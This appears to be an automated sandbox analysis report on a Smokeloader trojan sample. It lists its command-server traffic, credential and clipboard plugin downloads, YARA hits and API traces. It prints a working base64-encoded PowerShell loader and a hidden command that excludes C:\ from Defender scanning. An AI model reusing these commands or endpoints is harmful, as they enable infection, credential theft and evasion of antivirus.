Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ffekcgjxa.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: atillapro.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://flaflc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: atillapro.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://atillapro.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 501Host: atillapro.com
Source: unknown TCP traffic detected without corresponding DNS query: 216.250.255.115
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C31950 WSARecv, 13_3_00007DF488C31950
Source: global traffic HTTP traffic detected: GET /vsdjcn3khS/Plugins/cred64.dll HTTP/1.1Host: atillapro.com
Source: global traffic HTTP traffic detected: GET /vsdjcn3khS/Plugins/clip64.dll HTTP/1.1Host: atillapro.com
Source: unknown DNS traffic detected: queries for: atillapro.com
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pxiisjuf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: atillapro.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 10 Apr 2024 08:24:06 GMTServer: Apache/2.4.41 (Ubuntu)Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 10 Apr 2024 08:24:07 GMTServer: Apache/2.4.41 (Ubuntu)Keep-Alive: timeout=5, max=99Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 10 Apr 2024 08:24:08 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 401Keep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at atillapro.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 10 Apr 2024 08:24:08 GMTServer: Apache/2.4.41 (Ubuntu)Keep-Alive: timeout=5, max=97Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 10 Apr 2024 08:24:09 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 401Keep-Alive: timeout=5, max=96Connection: Keep-AliveContent-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at atillapro.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 10 Apr 2024 08:24:11 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 275Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at atillapro.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 10 Apr 2024 08:24:16 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 401Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at atillapro.com Port 80</address></body></html>
Source: powershell.exe, 00000005.00000002.2032888625.0000000006D50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: xwREqjHUEv.exe, 00000000.00000000.1996748280.000000000040A000.00000008.00000001.01000000.00000003.sdmp, xwREqjHUEv.exe, 00000000.00000002.2013767501.000000000040A000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000005.00000002.2031709829.0000000005857000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2117709095.0000000005CB7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.2114566601.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.2029024330.00000000047F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2114566601.0000000004C51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2114566601.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.2033375932.0000000006E17000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.coK
Source: dialer.exe, 00000008.00000002.2178871249.000000000327C000.00000004.00000010.00020000.00000000.sdmp, OpenWith.exe String found in binary or memory: https://216.250.255.115:80/bed1f869ae125/aqbrhghr.uhmsf
Source: powershell.exe, 00000005.00000002.2029024330.00000000047F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2114566601.0000000004C51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000006.00000002.2117709095.0000000005CB7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2117709095.0000000005CB7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2117709095.0000000005CB7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.2114566601.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.2029024330.0000000005051000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000005.00000002.2031709829.0000000005857000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2117709095.0000000005CB7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 22.2.gfiecjd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.AppLaunch.exe.1ff003ad060.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.D4C0.vmt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.gfiecjd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.AppLaunch.exe.1ff003bd080.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.D4C0.vmt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.AppLaunch.exe.1ff003b4af0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000002.2788977995.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2538928588.0000000000521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2538295136.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2790746450.0000000001EB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\gfiecjd, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe, type: DROPPED
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_0040571B
Source: Yara match File source: 8.3.dialer.exe.58a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.dialer.exe.5340000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.dialer.exe.5680000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.F324.exe.3b00000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.dialer.exe.5120000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.F324.exe.3d20000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.dialer.exe.5340000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000003.2791924717.0000000003B00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2107655935.0000000005680000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2824488495.0000000005120000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2825213965.0000000005340000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2107848027.00000000058A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 00000016.00000002.2788977995.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000013.00000002.2538928588.0000000000521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000013.00000002.2538295136.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000016.00000002.2790746450.0000000001EB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: Process Memory Space: powershell.exe PID: 2964, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5720, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\SysWOW64\cmd.exe Process created: Commandline size = 2883
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\UndLdl.ps1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwy
MjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENvbnZlcnQtQXNjaWlUb1N0cmluZyAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgIlVuZExkbC5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\user\UndLdl.ps1' -Encoding UTF8"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\UndLdl.ps1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_0000024AB89530C7 RtlAllocateHeap,RtlAllocateHeap,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor, 13_3_0000024AB89530C7
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C08A40 NtAcceptConnectPort, 13_3_00007DF488C08A40
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C08AFC NtAcceptConnectPort, 13_3_00007DF488C08AFC
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C09AF4 _malloc_dbg,NtAcceptConnectPort,NtAcceptConnectPort,??3@YAXPEAX@Z, 13_3_00007DF488C09AF4
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C08C08 NtAcceptConnectPort, 13_3_00007DF488C08C08
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C08C90 NtAcceptConnectPort, 13_3_00007DF488C08C90
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C09CA0 _calloc_dbg,NtAcceptConnectPort, 13_3_00007DF488C09CA0
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C08D74 NtAcceptConnectPort, 13_3_00007DF488C08D74
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C08D94 NtAcceptConnectPort, 13_3_00007DF488C08D94
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C09F40 NtAcceptConnectPort, 13_3_00007DF488C09F40
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C0B154 NtAcceptConnectPort,NtAcceptConnectPort, 13_3_00007DF488C0B154
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C0B088 NtAcceptConnectPort,NtAcceptConnectPort, 13_3_00007DF488C0B088
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C092CC NtAcceptConnectPort,_calloc_dbg,DuplicateHandle,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort, 13_3_00007DF488C092CC
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C0A2B0 NtAcceptConnectPort, 13_3_00007DF488C0A2B0
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C0A540 NtAcceptConnectPort, 13_3_00007DF488C0A540
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C0A600 NtAcceptConnectPort, 13_3_00007DF488C0A600
Source: C:\Windows\System32\OpenWith.exe Code function: 13_2_0000024AB87F0AC8 NtAcceptConnectPort,NtAcceptConnectPort, 13_2_0000024AB87F0AC8
Source: C:\Windows\System32\OpenWith.exe Code function: 13_2_0000024AB87F1A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler, 13_2_0000024AB87F1A90
Source: C:\Windows\System32\OpenWith.exe Code function: 13_2_0000024AB87F1CD0 RtlAllocateHeap,NtAcceptConnectPort,FindCloseChangeNotification, 13_2_0000024AB87F1CD0
Source: C:\Windows\System32\OpenWith.exe Code function: 13_2_0000024AB87F15AC NtAcceptConnectPort, 13_2_0000024AB87F15AC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71032868 NtAcceptConnectPort, 14_2_000001FF71032868
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_00401668 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 19_2_00401668
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_00401561 NtAllocateVirtualMemory, 19_2_00401561
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_0040156C NtAllocateVirtualMemory, 19_2_0040156C
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_00401673 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 19_2_00401673
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_0040157E NtAllocateVirtualMemory, 19_2_0040157E
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_00401599 NtAllocateVirtualMemory, 19_2_00401599
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_0040169C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 19_2_0040169C
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_0040159F NtAllocateVirtualMemory, 19_2_0040159F
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_004016A1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 19_2_004016A1
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_004016AA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 19_2_004016AA
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_004015AB NtAllocateVirtualMemory, 19_2_004015AB
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_00401668 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 22_2_00401668
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_00401561 NtAllocateVirtualMemory, 22_2_00401561
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_0040156C NtAllocateVirtualMemory, 22_2_0040156C
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_00401673 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 22_2_00401673
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_0040157E NtAllocateVirtualMemory, 22_2_0040157E
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_004025C5 NtEnumerateKey, 22_2_004025C5
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_00401599 NtAllocateVirtualMemory, 22_2_00401599
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_0040169C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 22_2_0040169C
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_0040159F NtAllocateVirtualMemory, 22_2_0040159F
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_004016A1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 22_2_004016A1
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_004016AA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 22_2_004016AA
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_004015AB NtAllocateVirtualMemory, 22_2_004015AB
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00580607 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 24_2_00580607
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A4B92 RtlMoveMemory,NtUnmapViewOfSection, 25_2_030A4B92
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A33C3 NtQueryInformationFile, 25_2_030A33C3
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A342B NtQueryObject,NtQueryObject,RtlMoveMemory, 25_2_030A342B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle, 25_2_030A349B
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403532
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_00406DC6 0_2_00406DC6
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_0040759D 0_2_0040759D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0312F3E8 6_2_0312F3E8
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_0000024AB895279C 13_3_0000024AB895279C
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_0000024AB8951BA6 13_3_0000024AB8951BA6
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_0000024AB8952C3C 13_3_0000024AB8952C3C
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_0000024AB8954A38 13_3_0000024AB8954A38
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_0000024AB8955E7C 13_3_0000024AB8955E7C
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_0000024AB895557C 13_3_0000024AB895557C
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_0000024AB89558FC 13_3_0000024AB89558FC
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_0000024AB89524F7 13_3_0000024AB89524F7
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BF5BD8 13_3_00007DF488BF5BD8
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C17318 13_3_00007DF488C17318
